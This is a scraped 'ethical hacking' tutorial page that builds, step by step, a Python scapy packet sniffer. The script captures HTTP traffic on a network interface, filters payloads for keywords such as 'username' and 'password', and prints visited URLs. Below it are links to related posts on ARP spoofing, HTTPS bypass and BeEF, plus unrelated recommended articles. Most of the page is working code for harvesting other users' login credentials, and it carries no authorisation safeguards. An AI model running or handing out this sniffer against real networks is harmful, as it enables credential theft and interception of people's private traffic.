Python Ethical Hacking - Packet Sniffer(1)
PACKET_SNIFFER
- Capture data flowing through an interface.
- Filter this data.
- Display Interesting information such as:
- Login info(username&password).
- Visited websites.
- Images.
- ...etc
PACKET_SNIFFER
CAPTURE & FILTER DATA
- scapy has a sniffer function.
- Can capture data sent to/from iface.
- Can call a function specified in prn on each packet.
Install the third party package.
pip install scapy_http
1. Write the Python to sniff all the Raw packets.
#!/usr/bin/env python from scapy.all import *
from scapy.layers.http import * def sniff(interface):
scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet) def process_sniffed_packet(packet):
if packet.haslayer(HTTPRequest):
if packet.haslayer(scapy.all.Raw):
print(packet.show()) sniff("eth0")
Execute the script and sniff the packets on eth0.
2. Filter the useful packets
#!/usr/bin/env python from scapy.all import *
from scapy.layers.http import * def sniff(interface):
scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet) def process_sniffed_packet(packet):
if packet.haslayer(HTTPRequest):
if packet.haslayer(scapy.all.Raw):
print(packet[scapy.all.Raw].load) sniff("eth0")
Execute the script and sniff the packets on eth0.
Rewrite the Python Script to filter the keywords.
#!/usr/bin/env python from scapy.all import *
from scapy.layers.http import * def sniff(interface):
scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet) def process_sniffed_packet(packet):
if packet.haslayer(HTTPRequest):
if packet.haslayer(scapy.all.Raw):
load = packet[scapy.all.Raw].load.decode(errors='ignore')
keywords = ["username", "user", "login", "password", "pass"]
for keyword in keywords:
if keyword in load:
print(load)
break sniff("eth0")
Add the feature - Extracting URL
#!/usr/bin/env python from scapy.all import *
from scapy.layers.http import * def sniff(interface):
scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet) def process_sniffed_packet(packet):
if packet.haslayer(HTTPRequest):
url = packet[HTTPRequest].Host + packet[HTTPRequest].Path
print(url) if packet.haslayer(scapy.all.Raw):
load = packet[scapy.all.Raw].load.decode(errors='ignore')
keywords = ["username", "user", "login", "password", "pass"]
for keyword in keywords:
if keyword in load:
print(load)
break sniff("eth0")
Python Ethical Hacking - Packet Sniffer(1)的更多相关文章
- Python Ethical Hacking - Packet Sniffer(2)
Capturing passwords from any computer connected to the same network. ARP_SPOOF + PACKET_SNIFFER Ta ...
- Python Ethical Hacking - ARP Spoofing
Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they ...
- Python Ethical Hacking - NETWORK_SCANNER(1)
NETWORK_SCANNER Discover all devices on the network. Display their IP address. Display their MAC add ...
- Python Ethical Hacking - Bypass HTTPS(1)
HTTPS: Problem: Data in HTTP is sent as plain text. A MITM can read and edit requests and responses. ...
- Python Ethical Hacking - BeEF Framework(1)
Browser Exploitation Framework. Allows us to launch a number of attacks on a hooked target. Targets ...
- Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(3)
Recalculating Content-Length: #!/usr/bin/env python import re from netfilterqueue import NetfilterQu ...
- Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(2)
MODIFYING DATA IN HTTP LAYER Edit requests/responses. Replace download requests. Inject code(html/Ja ...
- Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(1)
MODIFYING DATA IN HTTP LAYER Edit requests/responses. Replace download requests. Inject code(html/Ja ...
- Python Ethical Hacking - DNS Spoofing
What is DNS Spoofing Sniff the DNSRR packet and show on the terminal. #!/usr/bin/env python from net ...
随机推荐
- 前后端分离项目 nginx配置实践
新项目采用前后端分离的方式开发,前后端代码打算分开部署(同机器且同域名),但打算支持后端依然可访问静态资源. 搜索nginx配置大部分都通过url前缀进行转发来做前后端分离,不适用目前项目. 说明 前 ...
- strcmp函数的两种实现
strcmp函数的两种实现,gcc测试通过. 一种实现: C代码 #include<stdio.h> int strcmp(const char *str1,const char *s ...
- Python 简明教程 --- 11,Python 元组
微信公众号:码农充电站pro 个人主页:https://codeshellme.github.io 软件工程的目标是控制复杂度,而不是增加复杂性. -- Dr. Pamela Zave 目录 我们在上 ...
- Windows高DPI系列控件(一) - 饼图
目录 一.醉一醉 二.效果展示 三.高DPI适配 1.高DPI框架运作 2.适配高DPI 3.适配饼图 四.相关文章 原文链接:Windos高DPI系列控件(一) - 饼图 一.醉一醉 眨眼功夫,20 ...
- Spring拦截器和SpringAop实现
一.拦截器 1.aop是面向切面编程,原理是java的发射技术. 2.分为三类,before.after.arround 3.springMvc为我们提供了一个适配器HandlerIntercepto ...
- String类、static关键字、Arrays类、 Math类的一些学习心得
String类 java.lang.String 类代表字符串.Java程序中所有的字符串文字(例如"abc" )都可以被看作是实现此类的实例. 类 String 中包括用于检查各 ...
- mmdetection源码剖析(1)--NMS
mmdetection源码剖析(1)--NMS 熟悉目标检测的应该都清楚NMS是什么算法,但是如果我们要与C++和cuda结合直接写成Pytorch的操作你们清楚怎么写吗?最近在看mmdetectio ...
- 每日一题 - 剑指 Offer 31. 栈的压入、弹出序列
题目信息 时间: 2019-06-25 题目链接:Leetcode tag:栈 难易程度:中等 题目描述: 输入两个整数序列,第一个序列表示栈的压入顺序,请判断第二个序列是否为该栈的弹出顺序.假设压入 ...
- 好看css搜索框样式_分享8款纯CSS搜索框
最简单实用的CSS3搜索框样式,纯CSS效果无需任何javascript,其中部分搜索框在点击的时候有动画特效,搜索框的应用也是比较普通的,效果如下: 设计网站大全https://www.wode00 ...
- tbody滚动条占位导致与thead表头错位
tbody出滚动条导致表头错位,上网上搜了一下,发现全是答非所问,能隐藏滚动条,还用问??我当前作出的效果是当tbody内容在正常情况下显示时,不显示滚动条,当内容区域高度超过外部容器时,滚动条自动显 ...